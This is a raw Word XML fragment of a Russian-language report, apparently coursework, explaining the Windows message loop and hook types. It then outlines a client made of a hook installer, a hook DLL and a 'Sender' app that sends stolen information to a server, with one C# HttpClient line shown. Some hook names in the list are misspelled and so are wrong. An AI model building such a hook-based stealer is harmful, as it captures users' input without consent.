        </w:numPr>
        <w:ind w:left="709"/>
      </w:pPr>
      <w:r>
        <w:t>П</w:t>
      </w:r>
      <w:r w:rsidR="00700336">
        <w:t>рограмма вызывает функцию GetMessage.</w:t>
      </w:r>
      <w:r w:rsidR="00183B10">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00700336" w:rsidRDefault="00700336" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="709"/>
      </w:pPr>
      <w:r>
        <w:t>GetMessage извлекает сообщение WM_LBUTTONDOWN из очереди и заполняет структуру MSG.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00183B10" w:rsidRDefault="00F02388" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="709"/>
      </w:pPr>
      <w:r>
        <w:t>П</w:t>
      </w:r>
      <w:r w:rsidR="00700336">
        <w:t>рограмма вызывает функции TranslateMessage и DispatchMessage.</w:t>
      </w:r>
      <w:r w:rsidR="00183B10">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00700336" w:rsidRDefault="00700336" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="709"/>
      </w:pPr>
      <w:r>
        <w:t>Внутри DispatchMessage операционная система вызывает оконную процедуру.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00700336" w:rsidRDefault="00F02388" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="709"/>
      </w:pPr>
      <w:r>
        <w:t>О</w:t>
      </w:r>
      <w:r w:rsidR="00700336">
        <w:t>конная процедура может либо ответить на сообщение, либо проигнорировать его.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00340FB4" w:rsidRDefault="00700336" w:rsidP="00700336">
      <w:r>
        <w:t xml:space="preserve">Когда оконная процедура возвращается, она возвращается обратно в DispatchMessage. Это возвращает к циклу сообщений для следующего сообщения. Пока программа работает, сообщения будут продолжать поступать в очередь. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00486AA8" w:rsidRDefault="00486AA8" w:rsidP="00700336">
      <w:r>
        <w:t xml:space="preserve">Перехват вызовов функции GetMessage для конкретного процесса осуществляется через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WinHook</w:t>
      </w:r>
      <w:r w:rsidRPr="005343AD">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:r w:rsidRPr="00527683">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>далее Хук.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00486AA8" w:rsidRDefault="00486AA8" w:rsidP="00486AA8">
      <w:r>
        <w:t xml:space="preserve">Операционные системы семейства Microsoft Windows предлагают встроенные возможности по перехвату функций. Такие ловушки могут использоваться для целей видео/аудио захвата, расширения </w:t>
      </w:r>
      <w:r w:rsidR="00F02388">
        <w:t>функционала</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> закрытого ПО, журналирования. В то же время такой механизм может использовать </w:t>
      </w:r>
      <w:r w:rsidR="00F02388">
        <w:t>вредоносное</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ПО (трояны, кейлоггеры).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00486AA8" w:rsidRDefault="00486AA8" w:rsidP="00486AA8">
      <w:r>
        <w:t>Существует два способа перехвата функций в системе Windows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00486AA8" w:rsidRDefault="00F02388" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:left="709"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Н</w:t>
      </w:r>
      <w:r w:rsidR="00486AA8">
        <w:t>а основе подмены адреса функции в динамически подключаемых библиотеках</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00486AA8" w:rsidRDefault="00F02388" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:left="709"/>
      </w:pPr>
      <w:r>
        <w:t>Н</w:t>
      </w:r>
      <w:r w:rsidR="00486AA8">
        <w:t>а основе внедрения кода безусловного перехода на пользовательскую функцию в заголовке исполняемой программы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00486AA8" w:rsidRDefault="00486AA8" w:rsidP="00486AA8">
      <w:r>
        <w:t>Все остальные способы основываются на той или иной модификации одного из представленных способов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00486AA8" w:rsidRDefault="00486AA8" w:rsidP="00486AA8">
      <w:r>
        <w:t>Для работы с хуками используется вызов системных функций используется системный API. Существует 14 типов хуков:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00486AA8" w:rsidRDefault="00486AA8" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="709"/>
      </w:pPr>
      <w:r>
        <w:t>WH_CALLWNDPROC - хук вызывается при вызове SendMessage.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00486AA8" w:rsidRDefault="00486AA8" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="709"/>
      </w:pPr>
      <w:r>
        <w:t>WH_CALLWNDPROCRET - хук вызывается, когда возвращается SendMessage.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00486AA8" w:rsidRDefault="00486AA8" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="709"/>
      </w:pPr>
      <w:r>
        <w:t>WH_GETMESSAGE - хук вызывается, когда вызывается GetMessage или PeekMessage.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00486AA8" w:rsidRDefault="00486AA8" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="709"/>
      </w:pPr>
      <w:r>
        <w:t>WH_KEYBOARD - хук вызывается, когда GetMessage или PeekMessage получают WM_KEYUP или WM_KEYDOWN из очереди сообщений.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00486AA8" w:rsidRDefault="00486AA8" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="709"/>
      </w:pPr>
      <w:r>
        <w:t>WH_MOUSE - хук вызывается, когда GetMessage или PeekMessage получают сообщение от мыши из очереди сообщений.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00486AA8" w:rsidRDefault="00486AA8" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="709"/>
      </w:pPr>
      <w:r>
        <w:t>WH_HADRWARE - хук вызывается, когда GetMessage или PeekMessage получают хаpдваpное сообщение, не относящееся к клавиатуре или мыши.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00486AA8" w:rsidRDefault="00486AA8" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">WH_MSGFILTER - хук вызывается, когда диалоговое окно, меню или скpолбаp готовятся к </w:t>
      </w:r>
      <w:r w:rsidR="004E1687">
        <w:t>обработке</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> сообщения. Этот хук - локальный. Он создан специально для тех объектов, у </w:t>
      </w:r>
      <w:r w:rsidR="004E1687">
        <w:t>которых</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> свой </w:t>
      </w:r>
      <w:r w:rsidR="004E1687">
        <w:t>внутренний</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> цикл сообщений.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00486AA8" w:rsidRDefault="00486AA8" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="709"/>
      </w:pPr>
      <w:r>
        <w:t>WH_SYSMSGFILTER - то же самое WH_MSGFILTER, но системный.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00486AA8" w:rsidRDefault="00486AA8" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">WH_JOURNALRECORD - хук вызывается, когда Windows получает сообщение из </w:t>
      </w:r>
      <w:r w:rsidR="004E1687">
        <w:t>очереди</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> хаpдваpных сообщений.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00486AA8" w:rsidRDefault="00486AA8" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">WH_JOURNALPLAYBACK - хук вызывается, когда событие </w:t>
      </w:r>
      <w:r w:rsidR="004E1687">
        <w:t>запрашивается</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> из </w:t>
      </w:r>
      <w:r w:rsidR="004E1687">
        <w:t>очереди</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> хаpдваpных сообщений.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00486AA8" w:rsidRDefault="00486AA8" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="709"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">WH_SHELL - хук вызывается, когда </w:t>
      </w:r>
      <w:r w:rsidR="004E1687">
        <w:t>происходит</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> что-то </w:t>
      </w:r>
      <w:r w:rsidR="004E1687">
        <w:t>интересное</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и связанное с оболочкой, </w:t>
      </w:r>
      <w:r w:rsidR="004E1687">
        <w:t>например</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, когда таскбаpу нужно </w:t>
      </w:r>
      <w:r w:rsidR="004E1687">
        <w:t>перерисовать</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> кнопку.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00486AA8" w:rsidRDefault="00486AA8" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="709"/>
      </w:pPr>
      <w:r>
        <w:t>WH_CBN - хук используется специально для CBT.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00486AA8" w:rsidRDefault="00486AA8" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">WH_FOREGROUND - такие хуки используются Windows. Обычным </w:t>
      </w:r>
      <w:r w:rsidR="004E1687">
        <w:t>приложениям</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от них пользы немного.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C4C32" w:rsidRDefault="00486AA8" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="709"/>
      </w:pPr>
      <w:r>
        <w:t>WH_DEBUG - хук используется для отладки хук-</w:t>
      </w:r>
      <w:r w:rsidR="004E1687">
        <w:t>процедуры</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006711AD" w:rsidRDefault="006711AD" w:rsidP="00885267"/>
    <w:p w:rsidR="007F073E" w:rsidRDefault="00DD5091" w:rsidP="00ED6F1F">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc4724259"/>
      <w:r>
        <w:t>Разработка клиента</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w:rsidR="00DD5091" w:rsidRPr="00A44F46" w:rsidRDefault="00DD5091" w:rsidP="00ED6F1F">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc531587653"/>
      <w:bookmarkStart w:id="18" w:name="_Toc4724260"/>
      <w:r w:rsidRPr="00A44F46">
        <w:t>Программная платформа</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidR="00227875">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DA7DAD">
        <w:t xml:space="preserve">клиентского </w:t>
      </w:r>
      <w:r w:rsidR="00227875">
        <w:t>приложения</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w:rsidR="0079398D" w:rsidRPr="00490F59" w:rsidRDefault="0079398D" w:rsidP="00ED6F1F">
      <w:r>
        <w:t>Для разработки клиентского приложения была выбрана програ</w:t>
      </w:r>
      <w:r w:rsidR="00AB35AC">
        <w:t>ммная платформа .NET Framework совместно с</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> язык</w:t>
      </w:r>
      <w:r w:rsidR="00AB35AC">
        <w:t>ом</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> программирования C#</w:t>
      </w:r>
      <w:r w:rsidR="00AB35AC">
        <w:t xml:space="preserve"> и язык программирования </w:t>
      </w:r>
      <w:r w:rsidR="00490F59" w:rsidRPr="00490F59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Visual</w:t>
      </w:r>
      <w:r w:rsidR="00490F59" w:rsidRPr="00490F59">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00490F59" w:rsidRPr="00490F59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00490F59" w:rsidRPr="00490F59">
        <w:t>++</w:t>
      </w:r>
      <w:r w:rsidR="00AE42C8">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0079398D" w:rsidRDefault="0079398D" w:rsidP="00ED6F1F">
      <w:r w:rsidRPr="001227A2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>.NET Framework</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – программная платформа, выпущенная компанией Microsoft. Основой платформы является общеязыковая среда исполнения Common Language Runtime (CLR), которая подходит для разных языков программирования. Функциональные возможности CLR доступны в любых языках программирования, использующих эту среду.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0079398D" w:rsidRDefault="0079398D" w:rsidP="00ED6F1F">
      <w:r>
        <w:t>Использование .NET Framework позволяет разработчику взаимодействовать с неуправляемым кодом, импортируемым из системных библиотек. Управляемый код (managed code) – код программы, исполняемой под «управлением» виртуальной машин CLR. При этом машинный код называется неуправляемым кодом (unmanaged code).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0079398D" w:rsidRDefault="0079398D" w:rsidP="00ED6F1F">
      <w:r>
        <w:t>Слово «управляемый» здесь относится к методу обмена информацией между программой и исполняющей средой. Оно означает, что в любой точке исполнения управляющая среда может приостановить исполнение и получить информацию, специфичную для текущего состояния. Необходимая для этого информация представлена в управляемом коде на языке Intermediate Language и в связанных с этим кодом метаданных.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0079398D" w:rsidRDefault="0079398D" w:rsidP="00ED6F1F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Программа в .NET имеет свой менеджер памяти, который занимается автоматическим выделением памяти под объекты и очисткой памяти их использования (сборка мусора). Такой тип памяти называется управляемой памятью. Все объекты, которые создаются в .NET расп</w:t>
      </w:r>
      <w:r w:rsidR="00DD5091">
        <w:t>олагаются в управляемой памяти.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0079398D" w:rsidRDefault="0079398D" w:rsidP="00ED6F1F">
      <w:r>
        <w:t>Однако, программа может работать не только с управляемыми объектами. Часть объектов связана с операционной и файловой системами. Эти внешние ресурсы не связаны с менеджером памяти .NET и потому на них не распространяется автоматическое распределение памяти. Такая память и такие объекты называются неуправляемыми. Разработчик должен сам выделять память под такие объекты и освобождать ее.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B7559" w:rsidRPr="002B7559" w:rsidRDefault="00AE42C8" w:rsidP="002B7559">
      <w:r w:rsidRPr="00AE42C8">
        <w:t>Microsoft Visual C++</w:t>
      </w:r>
      <w:r w:rsidR="00490F59">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="002B7559">
        <w:t>компилируемый, статически типизированный язык программирования общего назначения.</w:t>
      </w:r>
      <w:r w:rsidR="002B7559" w:rsidRPr="002B7559">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00632AF7" w:rsidRPr="00AE42C8">
        <w:t>Visual</w:t>
      </w:r>
      <w:r w:rsidR="00632AF7" w:rsidRPr="002B7559">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002B7559" w:rsidRPr="002B7559">
        <w:t>C++ широко используется для разработки программного обеспечения, являясь одним из самых популярных языков программирования</w:t>
      </w:r>
      <w:r w:rsidR="001E0943">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="002B7559" w:rsidRPr="002B7559">
        <w:t>Область его применения включает создание операционных систем, разнообразных прикладных программ, драйверов устройств, приложений для встраиваемых систем, высокопроизводительных серверов, а также развлекательных приложений (игр).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B7559" w:rsidRPr="001E0943" w:rsidRDefault="002B7559" w:rsidP="002B7559">
      <w:r>
        <w:t xml:space="preserve">Так же у </w:t>
      </w:r>
      <w:r w:rsidR="00632AF7" w:rsidRPr="00AE42C8">
        <w:t>Visual</w:t>
      </w:r>
      <w:r w:rsidR="00632AF7" w:rsidRPr="00632AF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7559">
        <w:t>++</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> есть доступ к библиотеке </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WinAPI</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7559">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7559">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7559">
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7559">
        <w:t>32)</w:t>
      </w:r>
      <w:r w:rsidR="001E0943">
        <w:t xml:space="preserve">, в арсенале которой есть функции установки </w:t>
      </w:r>
      <w:r w:rsidR="001E0943">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WinHook</w:t>
      </w:r>
      <w:r w:rsidR="001E0943" w:rsidRPr="001E0943">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001E0943">
        <w:t>функций перехвата системных вызовов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00227875" w:rsidRPr="00A44F46" w:rsidRDefault="00227875" w:rsidP="00ED6F1F">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc531587654"/>
      <w:bookmarkStart w:id="20" w:name="_Toc4724261"/>
      <w:r w:rsidRPr="00A44F46">
        <w:t>Реализация клиентского приложения</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w:rsidR="00B51A76" w:rsidRPr="00307C1C" w:rsidRDefault="00B51A76" w:rsidP="00ED6F1F">
      <w:pPr>
        <w:pStyle w:val="a7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Клиентская часть состоит из </w:t>
      </w:r>
      <w:r w:rsidR="000C7990">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>совокупности</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> двух приложений и библиотеки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:r w:rsidR="00307C1C" w:rsidRPr="00307C1C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00307C1C" w:rsidRDefault="00307C1C" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22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Sender</w:t>
      </w:r>
      <w:r w:rsidRPr="00307C1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приложение для отправки украденной информации на сервер</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00307C1C" w:rsidRDefault="00307C1C" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22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Setter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – приложение установки Хука.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00307C1C" w:rsidRDefault="00307C1C" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22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HookL</w:t>
      </w:r>
      <w:r w:rsidRPr="00307C1C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ibrary</w:t>
      </w:r>
      <w:r w:rsidRPr="00593ED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dll</w:t>
      </w:r>
      <w:r w:rsidRPr="00593ED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библиотека устанавливаемая Хуком.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00227875" w:rsidRDefault="00441018" w:rsidP="000770C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Первым запускается </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sender</w:t>
      </w:r>
      <w:r w:rsidR="000770CC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> в безоконном режиме. </w:t>
      </w:r>
      <w:r w:rsidR="00227875" w:rsidRPr="00227875">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">После запуска </w:t>
      </w:r>
      <w:r w:rsidR="002C43F3">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">приложения </w:t>
      </w:r>
      <w:r w:rsidR="00227875" w:rsidRPr="00227875">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">инициализируется объект </w:t>
      </w:r>
      <w:r w:rsidR="002C43F3">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>идентификатор ресурса</w:t>
      </w:r>
      <w:r w:rsidR="00910C11">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – л</w:t>
      </w:r>
      <w:r w:rsidR="00E94CFC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">истинг </w:t>
      </w:r>
      <w:r w:rsidR="00305665">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00966446">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E94CFC" w:rsidRPr="0056715A" w:rsidRDefault="00E94CFC" w:rsidP="00ED6F1F">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0056715A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Листинг </w:t>
      </w:r>
      <w:r w:rsidR="00305665" w:rsidRPr="0056715A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000770CC" w:rsidRPr="0056715A" w:rsidRDefault="000770CC" w:rsidP="008A4402">
      <w:pPr>
        <w:pStyle w:val="a1"/>
      </w:pPr>
      <w:r w:rsidRPr="0056715A">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">private static readonly HttpClient client = new HttpClient() </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966446" w:rsidRPr="0056715A" w:rsidRDefault="000770CC" w:rsidP="008A4402">
      <w:pPr>
        <w:pStyle w:val="a1"/>
      </w:pPr>
      <w:r w:rsidRPr="0056715A">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>{ BaseAddress = new Uri(ConfigurationSettings.AppSettings.Get("conectionString"))};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC5133" w:rsidRDefault="008A4402" w:rsidP="00910C11">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0056715A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">После </w:t>
      </w:r>
      <w:r w:rsidR="00752B8C" w:rsidRPr="0056715A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
